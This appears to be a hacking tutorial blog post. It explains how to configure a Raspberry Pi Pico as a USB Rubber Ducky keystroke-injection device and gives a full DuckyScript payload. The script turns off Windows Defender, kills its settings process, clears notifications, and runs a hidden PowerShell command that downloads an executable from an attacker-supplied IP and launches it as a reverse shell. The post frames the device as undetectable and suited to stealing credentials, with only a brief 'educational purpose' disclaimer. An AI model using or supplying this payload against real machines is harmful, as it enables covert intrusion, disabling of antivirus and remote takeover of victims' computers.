What Is USB Rubber Ducky?
USB Rubber ducky is an HID (Human Interface Device) device that looks similar to a USB Pen drive. It may be used to inject keystrokes into a system, used to hack a system, steal victim’s essential and credential data can inject payload to the victim’s computers. The main important thing about USB Rubber ducky is that it cannot be detected by any Anti-Virus or Firewall as it acts as an HID device.
Tools & Software Required:
- One operating system to configure pico-ducky. (Windows 10)
- Raspberry Pi Pico
- CircuitPython
Configuring Raspberry Pi Pico
First, we need to set up the raspberry pi pico to show up as a hid device. The steps to configure:
Step 1:
- Download CircuitPython
- Plug your raspberry pi pico into your pc.
- Copy & paste the downloaded .uf2 in the raspberry pi pico.
- Unplug and plug your raspberry pi pico once again.
Now your Raspberry pi pico will reconnect as the CircuitPython.
Step 2:
- Now for making the raspberry pi pico pretend to be a hid device we have to download the hid library.
- Hid Library Download link ⇒ adafruit-circuitpython-bundle-6.x-mpy-20210130.zip
- Now extract the folder which you have downloaded.
- After the folder has been extracted open the folder and go to the ⇒ lib ⇒ adafruit_hid
- Now copy the adafruit_hid folder and paste it into the raspberry pi pico ⇒ lib folder.
Step 3:
- Now we have to delete the code.py file from raspberry pi pico.
- After deletion, we have to download the python file which will convert our payload. File Download Link ⇒ pico-ducky
- After the download is completed open the folder and copy & paste the duckyinpython.py file to the raspberry pi pico.
- Now we have to rename the duckyinpython.py file to the code.py.
Congrats now your raspberry pi pico is a USB rubber ducky.
Using Payload With The Pico-Ducky
Now that we have configured our raspberry pi pico to work as a USB rubber ducky we have to upload a payload that will work when the pico is plugged into a pc.
Step 1: Open notepad and paste any script available at Github pico-ducky for now, I will be using my own script which is given below.
Step 2: Now when you are going to save the file. Change the save as type to ALL FILES and rename the file to payload.dd and save the file to the raspberry pi pico.
!!Warning: As soon as you are going to save the file it is going to run the script.
This script below will turn off windows defender then clear the action center & create a reverse shell↓.
REM tested on: Windows 10
REM author: sploitech.com
REM turn off windows defender then clear action center & create a reverse shell
REM article URL: https://sploitech.com/raspberry-pi-projects/how-to-create-usb-rubber-ducky-with-raspberry-pi-pico/
REM This script is for educational purpose only.
GUI
DELAY 250
STRING Windows Defender Settings
DELAY 200
ENTER
DELAY 3000
ENTER
DELAY 1500
TAB
REPEAT 3
ENTER
DELAY 500
SPACE
DELAY 2500
LEFT
ENTER
TAB
SPACE
DELAY 500
TAB
SPACE
DELAY 500
TAB
SPACE
TAB
TAB
SPACE
GUI
DELAY 500
STRING Command Prompt
DELAY 200
ENTER
DELAY 1000
STRING taskkill/im SecHealthUI.exe -F
ENTER
DELAY 100
STRING exit
ENTER
DELAY 2000
GUI + a
DELAY 500
TAB
REPEAT 4
DELAY 500
ENTER
GUI + a
DELAY 150
GUI r
DELAY 1000
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://<I.p_address>/<shell_name>','%TEMP%\<shell_name>');Start-Process "%TEMP%\<shell_name>"
ENTERCopy
You will have to enter your own payload location on the highlighted line no. 56.
Link to other types of payload:
